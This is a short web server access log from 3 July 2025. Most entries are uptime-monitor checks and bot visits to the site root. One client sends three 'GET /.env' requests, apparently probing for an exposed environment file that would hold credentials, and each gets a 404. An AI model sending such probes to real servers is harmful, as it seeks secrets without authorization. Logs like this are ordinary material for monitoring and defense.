212.91.247.32 - - [03/Jul/2025:07:56:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.242.226.116 - - [03/Jul/2025:07:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
176.65.148.203 - - [03/Jul/2025:07:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:07:57:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:58:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [03/Jul/2025:07:59:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:07:59:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.242.226.116 - - [03/Jul/2025:07:59:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
204.76.203.206 - - [03/Jul/2025:08:00:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:08:00:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.110.115.106 - - [03/Jul/2025:08:01:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
77.110.115.106 - - [03/Jul/2025:08:01:23 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.247.32 - - [03/Jul/2025:08:01:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [03/Jul/2025:08:02:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:08:02:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [03/Jul/2025:08:03:42 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:08:03:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [03/Jul/2025:08:04:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
176.65.148.183 - - [03/Jul/2025:08:04:38 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:08:04:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [03/Jul/2025:08:05:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:08:05:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [03/Jul/2025:08:06:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:08:06:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
